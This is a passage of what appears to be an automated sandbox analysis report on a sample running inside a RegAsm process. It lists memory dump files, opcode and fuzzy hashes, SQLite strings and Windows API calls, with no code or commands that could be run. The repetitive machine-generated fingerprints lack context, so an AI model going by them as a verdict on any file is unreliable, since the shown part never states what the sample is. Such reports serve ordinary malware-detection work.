                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: JSON path error near '%q'
                                                                                                                                                                                                                                        • API String ID: 0-481711382
                                                                                                                                                                                                                                        • Opcode ID: 3b64b9589f21eb8cc5024d6ebd13eb92b0a1eac46b21adf43c373e839ed647af
                                                                                                                                                                                                                                        • Instruction ID: f56c292419c41776124a9e46f2dfd78c1a18675f60d4a7a7e37c23441969b6b8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b64b9589f21eb8cc5024d6ebd13eb92b0a1eac46b21adf43c373e839ed647af
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4010472A092116FDB149B54AC01B9B7BD5EF82330F28466CF8D6972D0DB71E80193E2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C51E53
                                                                                                                                                                                                                                        • misuse, xrefs: 19C51E59
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19C51E63
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                        • API String ID: 0-3564305576
                                                                                                                                                                                                                                        • Opcode ID: 0b6bad9890e21327fca30ac1f770fbb0f22133cee3df3acc5b5eaf21c1f06f01
                                                                                                                                                                                                                                        • Instruction ID: 11ba7c5368a26e592727796560a62d2f17c13c6208bc0e1c4abfd81ad7815c13
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b6bad9890e21327fca30ac1f770fbb0f22133cee3df3acc5b5eaf21c1f06f01
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB11E734708590DFE714CE29E88CE56BBB8BF81795F0C8458E086CB362D3B0D905C796
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 19C6F105
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                                                                                                                                                                                                        • API String ID: 0-2312637080
                                                                                                                                                                                                                                        • Opcode ID: b403bcea6c41395cc75775f1f7d7113e263b0eff535a1cfcf7969ec6030d5bff
                                                                                                                                                                                                                                        • Instruction ID: 03fa6e86fda955a20020b9adb857b30c1383fa62f42336b7358234514942dbb7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b403bcea6c41395cc75775f1f7d7113e263b0eff535a1cfcf7969ec6030d5bff
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85019A7B3042425FD321866EFC80F97BBE8EBC4321F09046AF5EDC3211D661A88583A1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s_stat
                                                                                                                                                                                                                                        • API String ID: 0-920702477
                                                                                                                                                                                                                                        • Opcode ID: ab9c6f8261d290416bb4867aecfdd6d96203cac29bf30466b761416ced8120d4
                                                                                                                                                                                                                                        • Instruction ID: 1a2b18b157f42a0ea311d53bcde97eb68c53ceb66198d49bccb9907cca650e58
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab9c6f8261d290416bb4867aecfdd6d96203cac29bf30466b761416ced8120d4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ADF02733B056623BEB008679FD40B86FBD5AF841B0F5D8625E48C93154C712BCD19391
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 19C67F76
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
                                                                                                                                                                                                                                        • API String ID: 0-3072645960
                                                                                                                                                                                                                                        • Opcode ID: 523df4280a428535cacda5d42624b6ec75783d606ec40c4aa4a652835e8a62ce
                                                                                                                                                                                                                                        • Instruction ID: bd39e55cd481e9e82d700a18af24567dc21cd28d9f172b4d6da0a25ec4c1d4c2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 523df4280a428535cacda5d42624b6ec75783d606ec40c4aa4a652835e8a62ce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1F0CD3B74430287D7015B18FC02B89A791AFD0321F2D4529F884962A0FB60A88583A2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9501ecaf34fe44904e44a06153c4f6225902612867c112cd58bde294f18817b3
                                                                                                                                                                                                                                        • Instruction ID: a1a44e2141e8d5dabfdb5356fa3ef3158c5358efb0b03880a71a8f30289a506f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9501ecaf34fe44904e44a06153c4f6225902612867c112cd58bde294f18817b3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7741B1766007019FD314CF18E980A52F7E5FF84324F28896EE98687B61E772F855CB90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410602
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000001), ref: 00410610
                                                                                                                                                                                                                                        • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410648
                                                                                                                                                                                                                                          • Part of subcall function 00411470: GetProcessHeap.KERNEL32(00000000,?,?,0041067B,00000000,?,?,00000001), ref: 0041147D
                                                                                                                                                                                                                                          • Part of subcall function 00411470: HeapFree.KERNEL32(00000000,?,0041067B,00000000,?,?,00000001), ref: 00411484
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00410692
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HeapInformationLogicalProcessor$ErrorFreeLastProcesswsprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 837085947-0
                                                                                                                                                                                                                                        • Opcode ID: 0d9c4edbb7559f74c35b9bd252e70d27db301ce926e9fbfe6edfc568aac6d805
                                                                                                                                                                                                                                        • Instruction ID: 366bb74dd286f18a7a484b3067aafd1d3a88729660cbb4a48cba89bc7db310ad
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d9c4edbb7559f74c35b9bd252e70d27db301ce926e9fbfe6edfc568aac6d805
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69210676E02128A7D7209A59BC40AFF77A8EF82714F14017BFC08D7201D7798EE582D9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                                                                                                                                                                                                        • Instruction ID: 302c94702b189e3916cc1528e27cbdea4ec9aa782f7c5a848af6e652c4179afd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2831A276508B819FD320CB25F88069BB7E1BF95314F19892DD4DA87A52D732F488C792
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                                                                                        • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                        • Instruction ID: 5caa51e322e81af1be4ceadbe4ea236f7c28ba83958f91cc1dc79586f8736deb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE114B3600114ABBCF126E95CC458EE3F32BB1D354B598416FA2859171D33ACAB2AB86
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,004283B0,00000000,?,00000000,00000000), ref: 0041030E
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,004283B0,00000000,?,00000000,00000000), ref: 00410315
                                                                                                                                                                                                                                        • GetLocalTime.KERNEL32(004283B0,?,004283B0,00000000,?,00000000,00000000), ref: 00410321
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0041034D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1243822799-0
                                                                                                                                                                                                                                        • Opcode ID: d417de8c9a0a209709a6de5710935ff17af1f368871aa643ccc311d4d337ff47
                                                                                                                                                                                                                                        • Instruction ID: db14e26b0bbffc5ca6930250cbb399bf26d4a56846ee06bee85017f3032141ff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d417de8c9a0a209709a6de5710935ff17af1f368871aa643ccc311d4d337ff47
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69F0BEBA900028BBC7149BDAAC499BFB7FDEF09B02F00514AFA4592180E7784950D3B4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: string or blob too big
                                                                                                                                                                                                                                        • API String ID: 0-2803948771
                                                                                                                                                                                                                                        • Opcode ID: ce9cbd6f62614f1cba52c269b26653f6d8320a6e295440439d3016ee8b084024
                                                                                                                                                                                                                                        • Instruction ID: 300d1c8f6c5ce5bda172dde4c2e41c4f5190834a5dfbe906f15221d6774d0c10
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce9cbd6f62614f1cba52c269b26653f6d8320a6e295440439d3016ee8b084024
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DA10576F487868FF7048E28EC41756BBD1AFC5220F5C1B2DE4E3972D1E760D4858A89
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
